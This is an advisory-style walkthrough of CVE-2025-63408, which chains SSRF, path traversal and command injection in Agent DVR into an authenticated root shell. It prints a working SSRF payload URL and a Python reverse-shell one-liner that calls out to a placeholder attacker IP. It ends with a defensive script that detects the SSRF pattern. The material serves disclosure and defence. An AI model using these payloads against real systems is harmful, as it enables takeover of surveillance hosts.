RCE in Agent DVR

Created on 2025-11-18 15:39, updated on 2025-11-18 15:42, by Alexandre Dulaunoy
Description:

Ref: https://www.ericholub.com/blog/agent-dvr-rce/

Agent DVR is surveillance recording software from iSpyConnect. Versions ≤ 6.6.7.0 are vulnerable to local path traversal, SSRF, and command injection (on Linux), which when combined lead to authenticated RCE. These findings have all been combined into CVE-2025-63408.

Walkthrough:

Agent DVR has a local API where you can access things like recordings without any kind of authentication. Here’s the API docs for it:

[Swagger UI](https://ispysoftware.github.io/Agent_API/#/)

One call in particular is interesting, which is ‘addrecording’. This lets you assign a ‘recording’ to a particular camera.

Turns out this call is vulnerable to path traversal. I’ve already written some exploit code on how to get any file from the filesystem from this:

https://github.com/eric-m-holub/double-agent

This vulnerability can be chained with SSRF and command injection vulnerabilities for full RCE. I’m going to be attacking Agent DVR v6.6.1.0 running on Ubuntu (Linux). I tested these vulns on Windows against the same Agent DVR version and found it was vulnerable to everything but the command injection.

First off, add a new Network IP Camera.

Next select the gear icon to update the Source Type:

Now enter in the following payload for ‘Live URL’:

`http://127.0.0.1:8090/command/addrecording?oid=1&ot=2&path=/etc/passwd&name=../../../../Commands/rce.sh`

Press ‘OK’ and then flip the camera on and off:

This leverages an SSRF vulnerability which calls this local API and creates a file called ‘rce.sh’ in the ‘Commands’ directory of Agent DVR using directory traversal. It doesn’t matter what the file contents are, only the file extension type.

Now create a new Action and Task for this camera:

Now on the popup to create a task select “Execute Command” and select the created ‘rce’ file:

For the ‘Parameters’ input, this is where you put your system command. Yes, this parameter is vulnerable to command injection, but only when you target a bash script. I had trouble with bash reverse shells, but Python works OK. Here’s that payload:

`python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'`

At this point, I’d suggest updating your new camera to something with an ‘Image’ source so we can make a new recording from it:

You can put any Image URL you want in there

So now start a listener on the port you specified in your payload, and then create a new recording on this new camera and you should get a root shell:

Tah dah. Agent DVR runs as root by default on Linux, so no privilege escalation is necessary. Have a good day.
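
A defender-side check for the first link of the chain above, as an added example that is not part of the original post or of Agent DVR: it audits camera source URLs for loopback `addrecording` calls whose `name` or `path` carries traversal. How the URLs are collected (configuration export, request logs) is an assumption, and the function names and extension list are hypothetical.

```python
import ipaddress
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: extensions worth flagging; the page only shows ".sh".
SCRIPT_EXTS = (".sh", ".bat", ".cmd", ".ps1")

# Constructed samples: the Live URL from the walkthrough, a double-encoded
# variant of it, and an ordinary camera stream.
SAMPLES = [
    "http://127.0.0.1:8090/command/addrecording?oid=1&ot=2&path=/etc/passwd&name=../../../../Commands/rce.sh",
    "http://localhost:8090/command/addrecording?oid=1&ot=2&path=a.mp4&name=..%252f..%252fCommands%252fx.SH",
    "rtsp://192.168.1.50:554/stream1",
]


def is_local_host(host):
    """True for 'localhost' and any IPv4/IPv6 loopback address."""
    if not host:
        return False
    if host.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False  # a DNS name other than localhost


def audit_source_url(url):
    """Return findings for one camera source URL (empty list = clean)."""
    findings = []
    parts = urlsplit(url)
    if is_local_host(parts.hostname):
        findings.append("loopback-target")  # SSRF back into the local API
    if parts.path.lower().rstrip("/").endswith("/command/addrecording"):
        findings.append("addrecording-call")
    params = parse_qs(parts.query)  # decodes one layer of percent-encoding
    for key in ("name", "path"):
        for value in params.get(key, []):
            # Decode a second layer and normalise Windows separators.
            decoded = unquote(value).replace("\\", "/")
            if "../" in decoded:
                findings.append(f"{key}-traversal")
            if key == "name" and decoded.lower().endswith(SCRIPT_EXTS):
                findings.append("name-script-extension")
    return findings


if __name__ == "__main__":
    for sample in SAMPLES:
        print(audit_source_url(sample) or ["clean"], sample)
```

Any URL that returns both `loopback-target` and `addrecording-call` deserves review even without traversal, since a camera source has no reason to call the local command API.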

